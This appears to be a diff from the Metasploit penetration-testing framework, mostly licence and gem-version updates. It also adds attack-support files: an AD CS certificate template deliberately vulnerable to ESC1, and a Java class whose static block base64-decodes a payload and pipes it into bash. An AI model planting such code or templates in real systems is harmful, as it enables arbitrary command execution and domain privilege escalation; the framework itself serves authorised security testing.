 Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
 License: Apache 2.0
@@ -44,6 +49,11 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

+Files: data/wordlists/flask_secret_keys.txt
+Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
+Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
+License: MIT
+
 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause
@@ -75,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT

+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+         function calls to implement the exploit.  The heavily modified C main is necessary
+         to create and trigger the exploit.
+
 Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
 Copyright: 2011 Jon Bringhurst
 License: GNU GPL 2.0
@@ -1,21 +1,25 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 7.0.4.3, MIT
-actionview, 7.0.4.3, MIT
-activemodel, 7.0.4.3, MIT
-activerecord, 7.0.4.3, MIT
-activesupport, 7.0.4.3, MIT
+actionpack, 7.0.5, MIT
+actionview, 7.0.5, MIT
+activemodel, 7.0.5, MIT
+activerecord, 7.0.5, MIT
+activesupport, 7.0.5, MIT
 addressable, 2.8.4, "Apache 2.0"
 afm, 0.2.2, MIT
+allure-rspec, 2.22.0, "Apache 2.0"
+allure-ruby-commons, 2.22.0, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.749.0, "Apache 2.0"
-aws-sdk-core, 3.171.0, "Apache 2.0"
-aws-sdk-ec2, 1.375.0, "Apache 2.0"
-aws-sdk-iam, 1.77.0, "Apache 2.0"
-aws-sdk-kms, 1.63.0, "Apache 2.0"
-aws-sdk-s3, 1.120.1, "Apache 2.0"
+aws-partitions, 1.776.0, "Apache 2.0"
+aws-sdk-core, 3.174.0, "Apache 2.0"
+aws-sdk-ec2, 1.382.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.27.0, "Apache 2.0"
+aws-sdk-iam, 1.79.0, "Apache 2.0"
+aws-sdk-kms, 1.66.0, "Apache 2.0"
+aws-sdk-s3, 1.123.1, "Apache 2.0"
+aws-sdk-ssm, 1.151.0, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
@@ -31,7 +35,8 @@ concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.7.2, "ruby, Simplified BSD"
+date, 3.3.3, "ruby, Simplified BSD"
+debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.70.0, "Apache 2.0"
 docile, 1.4.0, MIT
@@ -44,9 +49,9 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
 faker, 3.2.0, MIT
-faraday, 2.7.4, MIT
+faraday, 2.7.6, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.1.0, MIT
+faraday-retry, 2.2.0, MIT
 faye-websocket, 0.11.2, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -59,63 +64,67 @@ hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
 http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.12.0, MIT
+i18n, 1.14.1, MIT
 io-console, 0.6.0, "ruby, Simplified BSD"
-irb, 1.6.4, "ruby, Simplified BSD"
+irb, 1.7.0, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.20.0, MIT
+loofah, 2.21.3, MIT
+macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
-metasploit-credential, 6.0.4, "New BSD"
-metasploit-framework, 6.3.16, "New BSD"
+metasploit-credential, 6.0.5, "New BSD"
+metasploit-framework, 6.3.38, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
-metasploit-payloads, 2.0.130, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
-metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mini_portile2, 2.8.1, MIT
+mime-types, 3.4.1, MIT
+mime-types-data, 3.2023.0218.1, MIT
+mini_portile2, 2.8.2, MIT
 minitest, 5.18.0, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
+net-imap, 0.3.7, "ruby, Simplified BSD"
 net-ldap, 0.18.0, MIT
 net-protocol, 0.2.1, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.1.0, MIT
-network_interface, 0.0.2, MIT
+network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.9, MIT
-nokogiri, 1.14.3, MIT
+nokogiri, 1.14.5, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
-packetfu, 1.1.13, BSD
+packetfu, 2.0.0, "New BSD"
 parallel, 1.23.0, MIT
-parser, 3.2.2.1, MIT
+parser, 3.2.2.3, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.4.6, "Simplified BSD"
+pg, 1.5.3, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 5.0.1, MIT
-puma, 6.2.2, "New BSD"
-racc, 1.6.2, "ruby, Simplified BSD"
-rack, 2.2.6.4, MIT
+puma, 6.3.0, "New BSD"
+racc, 1.7.0, "ruby, Simplified BSD"
+rack, 2.2.7, MIT
 rack-protection, 3.0.6, MIT
 rack-test, 2.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.5.0, MIT
-railties, 7.0.4.3, MIT
+rails-html-sanitizer, 1.6.0, MIT
+railties, 7.0.5, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rasn1, 0.12.1, MIT
@@ -123,10 +132,11 @@ rb-readline, 0.5.5, BSD
 recog, 3.1.1, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.8.0, MIT
-reline, 0.3.3, ruby
+reline, 0.3.5, ruby
+require_all, 3.0.0, MIT
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.30, "New BSD"
+rex-core, 0.1.31, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
 rex-exploitation, 0.1.38, "New BSD"
 rex-java, 0.1.6, "New BSD"
@@ -137,23 +147,24 @@ rex-powershell, 0.1.97, "New BSD"
 rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.49, "New BSD"
+rex-socket, 0.1.54, "New BSD"
 rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.50, "New BSD"
+rex-text, 0.2.52, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
-rspec-core, 3.12.1, MIT
-rspec-expectations, 3.12.2, MIT
+rspec-core, 3.12.2, MIT
+rspec-expectations, 3.12.3, MIT
 rspec-mocks, 3.12.5, MIT
-rspec-rails, 6.0.1, MIT
+rspec-rails, 6.0.3, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.50.2, MIT
-rubocop-ast, 1.28.0, MIT
+rubocop, 1.52.0, MIT
+rubocop-ast, 1.29.0, MIT
 ruby-macho, 3.0.0, MIT
+ruby-mysql, 4.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
@@ -166,15 +177,17 @@ simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
 sinatra, 3.0.6, MIT
-sqlite3, 1.6.2, "New BSD"
+sqlite3, 1.6.3, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
+systemu, 2.6.5, ruby
+test-prof, 1.2.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.2.1, MIT
-tilt, 2.1.0, MIT
+thor, 1.2.2, MIT
+tilt, 2.2.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.2, "ruby, Simplified BSD"
+timeout, 0.4.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2023.3, MIT
@@ -182,6 +195,7 @@ unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.4.2, MIT
 unix-crypt, 1.3.1, 0BSD
+uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
 webrick, 1.8.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
@@ -192,4 +206,4 @@ winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.34, MIT
-zeitwerk, 2.6.7, MIT
+zeitwerk, 2.6.8, MIT
@@ -91,8 +91,8 @@ begin
  }
  invalidate_bootsnap_cache!(bootsnap_config)
  Bootsnap.setup(**bootsnap_config)
-rescue
-  $stderr.puts 'Warning: Failed bootsnap cache setup'
+rescue => e
+  $stderr.puts "Warning: Failed bootsnap cache setup - #{e.class} #{e} #{e.backtrace}"
  begin
    FileUtils.rm_rf(cache_dir, secure: true)
  rescue
@@ -0,0 +1,15 @@
+---
+info:
+  title: Metasploit Framework
+  description: Metasploit Framework
+  x-cortex-git:
+    github:
+      alias: r7org
+      repository: rapid7/metasploit-framework
+  x-cortex-tag: metasploit-framework
+  x-cortex-type: service
+  x-cortex-domain-parents:
+  - tag: metasploit
+openapi: 3.0.1
+servers:
+- url: "/"
@@ -0,0 +1,27 @@
+---
+# Creates a template that will be vulnerable to ESC 1 (subject name supplied in
+# the request). Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: -1
+pKICriticalExtensions:
+- 2.5.29.19
+- 2.5.29.15
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+msPKI-Certificate-Name-Flag: 1
+msPKI-Minimal-Key-Size: 2048
@@ -0,0 +1,11 @@
+import java.util.Base64;
+
+public class PayloadRuns {
+    static {
+        try {
+            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+}
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin changelog</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add changelog content here
+</p>
+</body>
+</html>
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<plugin>
+   <class>com.example.openfire.plugin.Example</class>
+   <name>PLUGINNAME</name>
+   <description>PLUGINDESCRIPTION</description>
+   <author>PLUGINAUTHOR</author>
+   <version>1.0.0</version>
+   <date>7/7/2008</date>
+   <minServerVersion>3.5.0</minServerVersion>
+</plugin>
@@ -0,0 +1,69 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+
+<html>
+<head>
+	<title>Example plugin readme</title>
+    <style type="text/css">
+        BODY {
+            font-size : 100%;
+        }
+        BODY, TD, TH {
+            font-family : tahoma, verdana, arial, helvetica, sans-serif;
+            font-size : 0.8em;
+        }
+        H2 {
+             font-size : 10pt;
+             font-weight : bold;
+        }
+        A:hover {
+            text-decoration : none;
+        }
+        H1 {
+            font-family : tahoma, arial, helvetica, sans-serif;
+            font-size : 1.4em;
+            font-weight: bold;
+            border-bottom : 1px #ccc solid;
+            padding-bottom : 2px;
+        }
+
+        TT {
+            font-family : courier new;
+            font-weight : bold;
+            color : #060;
+        }
+        PRE {
+            font-family : courier new;
+            font-size : 100%;
+        }
+        .events TH {
+            font-size: 8pt;
+            font-family: verdana;
+            font-weight: bold;
+            text-align: left;
+            background-color: #eee;
+            border-bottom: 1px #ccc solid;
+        }
+
+        .events .event {
+            font-weight: bold;
+        }
+
+        .events TD {
+            border-bottom: 1px #ccc dotted;
+            vertical-align: top;
+        }
+    </style>
+</head>
+<body>
+
+<h1>
+Example plugin
+</h1>
+
+<h2>Todo</h2>
+
+<p>
+Add readme content here
+</p>
+</body>
+</html>
@@ -0,0 +1,615 @@
+[
+    "V3_0_0_SNAPSHOT",
+    "V3_0_0_ALPHA1",
+    "V3_0_0_BETA1",
+    "V3_0_0_BETA2",
+    "V3_0_0_BETA3",
+    "V3_0_0_BETA4",
+    "V3_0_0_BETA5",
+    "V3_0_0_BETA6_SNAPSHOT",
+    "V3_0_0_BETA6",
+    "V3_0_0_BETA7_SNAPSHOT",
+    "V3_0_0_BETA7",
+    "V3_0_0_BETA8_SNAPSHOT",
+    "V3_0_0_BETA8",
+    "V3_0_0_BETA9_SNAPSHOT",
+    "V3_0_0_BETA9",
+    "V3_0_0_FINAL",
+    "V3_0_1_SNAPSHOT",
+    "V3_0_1",
+    "V3_0_2_SNAPSHOT",
+    "V3_0_2",
+    "V3_0_3_SNAPSHOT",
+    "V3_0_3",
+    "V3_0_4_SNAPSHOT",
+    "V3_0_4",
+    "V3_0_5_SNAPSHOT",
+    "V3_0_5",
+    "V3_0_6_SNAPSHOT",
+    "V3_0_6",
+    "V3_0_7_SNAPSHOT",
+    "V3_0_7",
+    "V3_0_8_SNAPSHOT",
+    "V3_0_8",
+    "V3_0_9_SNAPSHOT",
+    "V3_0_9",
+    "V3_0_10_SNAPSHOT",
+    "V3_0_10",
+    "V3_0_11_SNAPSHOT",
+    "V3_0_11",
+    "V3_0_12_SNAPSHOT",
+    "V3_0_12",
+    "V3_0_13_SNAPSHOT",
+    "V3_0_13",
+    "V3_0_14_SNAPSHOT",
+    "V3_0_14",
+    "V3_0_15_SNAPSHOT",
+    "V3_0_15",
+    "V3_1_0_SNAPSHOT",
+    "V3_1_0",
+    "V3_1_1_SNAPSHOT",
+    "V3_1_1",
+    "V3_1_2_SNAPSHOT",
+    "V3_1_2",
+    "V3_1_3_SNAPSHOT",
+    "V3_1_3",
+    "V3_1_4_SNAPSHOT",
+    "V3_1_4",
+    "V3_1_5_SNAPSHOT",
+    "V3_1_5",
+    "V3_1_6_SNAPSHOT",
+    "V3_1_6",
+    "V3_1_7_SNAPSHOT",
+    "V3_1_7",
+    "V3_1_8_SNAPSHOT",
+    "V3_1_8",
+    "V3_1_9_SNAPSHOT",
+    "V3_1_9",
+    "V3_2_0_SNAPSHOT",
+    "V3_2_0",
+    "V3_2_1_SNAPSHOT",
+    "V3_2_1",
+    "V3_2_2_SNAPSHOT",
+    "V3_2_2",
+    "V3_2_3_SNAPSHOT",
+    "V3_2_3",
+    "V3_2_4_SNAPSHOT",
+    "V3_2_4",
+    "V3_2_5_SNAPSHOT",
+    "V3_2_5",
+    "V3_2_6_SNAPSHOT",
+    "V3_2_6",
+    "V3_2_7_SNAPSHOT",
+    "V3_2_7",
+    "V3_2_8_SNAPSHOT",
+    "V3_2_8",
+    "V3_2_9_SNAPSHOT",
+    "V3_2_9",
+    "V3_3_1_SNAPSHOT",
+    "V3_3_1",
+    "V3_3_2_SNAPSHOT",
+    "V3_3_2",
+    "V3_3_3_SNAPSHOT",
+    "V3_3_3",
+    "V3_3_4_SNAPSHOT",
+    "V3_3_4",
+    "V3_3_5_SNAPSHOT",
+    "V3_3_5",
+    "V3_3_6_SNAPSHOT",
+    "V3_3_6",
+    "V3_3_7_SNAPSHOT",
+    "V3_3_7",
+    "V3_3_8_SNAPSHOT",
+    "V3_3_8",
+    "V3_3_9_SNAPSHOT",
+    "V3_3_9",
+    "V3_4_1_SNAPSHOT",
+    "V3_4_1",
+    "V3_4_2_SNAPSHOT",
+    "V3_4_2",
+    "V3_4_3_SNAPSHOT",
+    "V3_4_3",
+    "V3_4_4_SNAPSHOT",
+    "V3_4_4",
+    "V3_4_5_SNAPSHOT",
+    "V3_4_5",
+    "V3_4_6_SNAPSHOT",
+    "V3_4_6",
+    "V3_4_7_SNAPSHOT",
+    "V3_4_7",
+    "V3_4_8_SNAPSHOT",
+    "V3_4_8",
+    "V3_4_9_SNAPSHOT",
+    "V3_4_9",
+    "V3_5_1_SNAPSHOT",
+    "V3_5_1",
+    "V3_5_2_SNAPSHOT",
+    "V3_5_2",
+    "V3_5_3_SNAPSHOT",
+    "V3_5_3",
+    "V3_5_4_SNAPSHOT",
+    "V3_5_4",
+    "V3_5_5_SNAPSHOT",
+    "V3_5_5",
+    "V3_5_6_SNAPSHOT",
+    "V3_5_6",
+    "V3_5_7_SNAPSHOT",
+    "V3_5_7",
+    "V3_5_8_SNAPSHOT",
+    "V3_5_8",
+    "V3_5_9_SNAPSHOT",
+    "V3_5_9",
+    "V3_6_1_SNAPSHOT",
+    "V3_6_1",
+    "V3_6_2_SNAPSHOT",
+    "V3_6_2",
+    "V3_6_3_SNAPSHOT",
+    "V3_6_3",
+    "V3_6_4_SNAPSHOT",
+    "V3_6_4",
+    "V3_6_5_SNAPSHOT",
+    "V3_6_5",
+    "V3_6_6_SNAPSHOT",
+    "V3_6_6",
+    "V3_6_7_SNAPSHOT",
+    "V3_6_7",
+    "V3_6_8_SNAPSHOT",
+    "V3_6_8",
+    "V3_6_9_SNAPSHOT",
+    "V3_6_9",
+    "V3_7_1_SNAPSHOT",
+    "V3_7_1",
+    "V3_7_2_SNAPSHOT",
+    "V3_7_2",
+    "V3_7_3_SNAPSHOT",
+    "V3_7_3",
+    "V3_7_4_SNAPSHOT",
+    "V3_7_4",
+    "V3_7_5_SNAPSHOT",
+    "V3_7_5",
+    "V3_7_6_SNAPSHOT",
+    "V3_7_6",
+    "V3_7_7_SNAPSHOT",
+    "V3_7_7",
+    "V3_7_8_SNAPSHOT",
+    "V3_7_8",
+    "V3_7_9_SNAPSHOT",
+    "V3_7_9",
+    "V3_8_1_SNAPSHOT",
+    "V3_8_1",
+    "V3_8_2_SNAPSHOT",
+    "V3_8_2",
+    "V3_8_3_SNAPSHOT",
+    "V3_8_3",
+    "V3_8_4_SNAPSHOT",
+    "V3_8_4",
+    "V3_8_5_SNAPSHOT",
+    "V3_8_5",
+    "V3_8_6_SNAPSHOT",
+    "V3_8_6",
+    "V3_8_7_SNAPSHOT",
+    "V3_8_7",
+    "V3_8_8_SNAPSHOT",
+    "V3_8_8",
+    "V3_8_9_SNAPSHOT",
+    "V3_8_9",
+    "V3_9_1_SNAPSHOT",
+    "V3_9_1",
+    "V3_9_2_SNAPSHOT",
+    "V3_9_2",
+    "V3_9_3_SNAPSHOT",
+    "V3_9_3",
+    "V3_9_4_SNAPSHOT",
+    "V3_9_4",
+    "V3_9_5_SNAPSHOT",
+    "V3_9_5",
+    "V3_9_6_SNAPSHOT",
+    "V3_9_6",
+    "V3_9_7_SNAPSHOT",
+    "V3_9_7",
+    "V3_9_8_SNAPSHOT",
+    "V3_9_8",
+    "V3_9_9_SNAPSHOT",
+    "V3_9_9",
+    "V4_0_0_SNAPSHOT",
+    "V4_0_0",
+    "V4_0_1_SNAPSHOT",
+    "V4_0_1",
+    "V4_0_2_SNAPSHOT",
+    "V4_0_2",
+    "V4_0_3_SNAPSHOT",
+    "V4_0_3",
+    "V4_0_4_SNAPSHOT",
+    "V4_0_4",
+    "V4_0_5_SNAPSHOT",
+    "V4_0_5",
+    "V4_0_6_SNAPSHOT",
+    "V4_0_6",
+    "V4_0_7_SNAPSHOT",
+    "V4_0_7",
+    "V4_0_8_SNAPSHOT",
+    "V4_0_8",
+    "V4_0_9_SNAPSHOT",
+    "V4_0_9",
+    "V4_1_0_SNAPSHOT",
+    "V4_1_0",
+    "V4_1_1_SNAPSHOT",
+    "V4_1_1",
+    "V4_1_2_SNAPSHOT",
+    "V4_1_2",
+    "V4_1_3_SNAPSHOT",
+    "V4_1_3",
+    "V4_1_4_SNAPSHOT",
+    "V4_1_4",
+    "V4_1_5_SNAPSHOT",
+    "V4_1_5",
+    "V4_1_6_SNAPSHOT",
+    "V4_1_6",
+    "V4_1_7_SNAPSHOT",
+    "V4_1_7",
+    "V4_1_8_SNAPSHOT",
+    "V4_1_8",
+    "V4_1_9_SNAPSHOT",
+    "V4_1_9",
+    "V4_2_0_SNAPSHOT",
+    "V4_2_0",
+    "V4_2_1_SNAPSHOT",
+    "V4_2_1",
+    "V4_2_2_SNAPSHOT",
+    "V4_2_2",
+    "V4_2_3_SNAPSHOT",
+    "V4_2_3",
+    "V4_2_4_SNAPSHOT",
+    "V4_2_4",
+    "V4_2_5_SNAPSHOT",
+    "V4_2_5",
+    "V4_2_6_SNAPSHOT",
+    "V4_2_6",
+    "V4_2_7_SNAPSHOT",
+    "V4_2_7",
+    "V4_2_8_SNAPSHOT",
+    "V4_2_8",
+    "V4_2_9_SNAPSHOT",
+    "V4_2_9",
+    "V4_3_0_SNAPSHOT",
+    "V4_3_0",
+    "V4_3_1_SNAPSHOT",
+    "V4_3_1",
+    "V4_3_2_SNAPSHOT",
+    "V4_3_2",
+    "V4_3_3_SNAPSHOT",
+    "V4_3_3",
+    "V4_3_4_SNAPSHOT",
+    "V4_3_4",
+    "V4_3_5_SNAPSHOT",
+    "V4_3_5",
+    "V4_3_6_SNAPSHOT",
+    "V4_3_6",
+    "V4_3_7_SNAPSHOT",
+    "V4_3_7",
+    "V4_3_8_SNAPSHOT",
+    "V4_3_8",
+    "V4_3_9_SNAPSHOT",
+    "V4_3_9",
+    "V4_4_0_SNAPSHOT",
+    "V4_4_0",
+    "V4_4_1_SNAPSHOT",
+    "V4_4_1",
+    "V4_4_2_SNAPSHOT",
+    "V4_4_2",
+    "V4_4_3_SNAPSHOT",
+    "V4_4_3",
+    "V4_4_4_SNAPSHOT",
+    "V4_4_4",
+    "V4_4_5_SNAPSHOT",
+    "V4_4_5",
+    "V4_4_6_SNAPSHOT",
+    "V4_4_6",
+    "V4_4_7_SNAPSHOT",
+    "V4_4_7",
+    "V4_4_8_SNAPSHOT",
+    "V4_4_8",
+    "V4_4_9_SNAPSHOT",
+    "V4_4_9",
+    "V4_5_0_SNAPSHOT",
+    "V4_5_0",
+    "V4_5_1_SNAPSHOT",
+    "V4_5_1",
+    "V4_5_2_SNAPSHOT",
+    "V4_5_2",
+    "V4_5_3_SNAPSHOT",
+    "V4_5_3",
+    "V4_5_4_SNAPSHOT",
+    "V4_5_4",
+    "V4_5_5_SNAPSHOT",
+    "V4_5_5",
+    "V4_5_6_SNAPSHOT",
+    "V4_5_6",
+    "V4_5_7_SNAPSHOT",
+    "V4_5_7",
+    "V4_5_8_SNAPSHOT",
+    "V4_5_8",
+    "V4_5_9_SNAPSHOT",
+    "V4_5_9",
+    "V4_6_0_SNAPSHOT",
+    "V4_6_0",
+    "V4_6_1_SNAPSHOT",
+    "V4_6_1",
+    "V4_6_2_SNAPSHOT",
+    "V4_6_2",
+    "V4_6_3_SNAPSHOT",
+    "V4_6_3",
+    "V4_6_4_SNAPSHOT",
+    "V4_6_4",
+    "V4_6_5_SNAPSHOT",
+    "V4_6_5",
+    "V4_6_6_SNAPSHOT",
+    "V4_6_6",
+    "V4_6_7_SNAPSHOT",
+    "V4_6_7",
+    "V4_6_8_SNAPSHOT",
+    "V4_6_8",
+    "V4_6_9_SNAPSHOT",
+    "V4_6_9",
+    "V4_7_0_SNAPSHOT",
+    "V4_7_0",
+    "V4_7_1_SNAPSHOT",
+    "V4_7_1",
+    "V4_7_2_SNAPSHOT",
+    "V4_7_2",
+    "V4_7_3_SNAPSHOT",
+    "V4_7_3",
+    "V4_7_4_SNAPSHOT",
+    "V4_7_4",
+    "V4_7_5_SNAPSHOT",
+    "V4_7_5",
+    "V4_7_6_SNAPSHOT",
+    "V4_7_6",
+    "V4_7_7_SNAPSHOT",
+    "V4_7_7",
+    "V4_7_8_SNAPSHOT",
+    "V4_7_8",
+    "V4_7_9_SNAPSHOT",
+    "V4_7_9",
+    "V4_8_0_SNAPSHOT",
+    "V4_8_0",
+    "V4_8_1_SNAPSHOT",
+    "V4_8_1",
+    "V4_8_2_SNAPSHOT",
+    "V4_8_2",
+    "V4_8_3_SNAPSHOT",
+    "V4_8_3",
+    "V4_8_4_SNAPSHOT",
+    "V4_8_4",
+    "V4_8_5_SNAPSHOT",
+    "V4_8_5",
+    "V4_8_6_SNAPSHOT",
+    "V4_8_6",
+    "V4_8_7_SNAPSHOT",
+    "V4_8_7",
+    "V4_8_8_SNAPSHOT",
+    "V4_8_8",
+    "V4_8_9_SNAPSHOT",
+    "V4_8_9",
+    "V4_9_0_SNAPSHOT",
+    "V4_9_0",
+    "V4_9_1_SNAPSHOT",
+    "V4_9_1",
+    "V4_9_2_SNAPSHOT",
+    "V4_9_2",
+    "V4_9_3_SNAPSHOT",
+    "V4_9_3",
+    "V4_9_4_SNAPSHOT",
+    "V4_9_4",
+    "V4_9_5_SNAPSHOT",
+    "V4_9_5",
+    "V4_9_6_SNAPSHOT",
+    "V4_9_6",
+    "V4_9_7_SNAPSHOT",
+    "V4_9_7",
+    "V4_9_8_SNAPSHOT",
+    "V4_9_8",
+    "V4_9_9_SNAPSHOT",
+    "V4_9_9",
+    "V5_0_0_SNAPSHOT",
+    "V5_0_0",
+    "V5_0_1_SNAPSHOT",
+    "V5_0_1",
+    "V5_0_2_SNAPSHOT",
+    "V5_0_2",
+    "V5_0_3_SNAPSHOT",
+    "V5_0_3",
+    "V5_0_4_SNAPSHOT",
+    "V5_0_4",
+    "V5_0_5_SNAPSHOT",
+    "V5_0_5",
+    "V5_0_6_SNAPSHOT",
+    "V5_0_6",
+    "V5_0_7_SNAPSHOT",
+    "V5_0_7",
+    "V5_0_8_SNAPSHOT",
+    "V5_0_8",
+    "V5_0_9_SNAPSHOT",
+    "V5_0_9",
+    "V5_1_0_SNAPSHOT",
+    "V5_1_0",
+    "V5_1_1_SNAPSHOT",
+    "V5_1_1",
+    "V5_1_2_SNAPSHOT",
+    "V5_1_2",
+    "V5_1_3_SNAPSHOT",
+    "V5_1_3",
+    "V5_1_4_SNAPSHOT",
+    "V5_1_4",
+    "V5_1_5_SNAPSHOT",
+    "V5_1_5",
+    "V5_1_6_SNAPSHOT",
+    "V5_1_6",
+    "V5_1_7_SNAPSHOT",
+    "V5_1_7",
+    "V5_1_8_SNAPSHOT",
+    "V5_1_8",
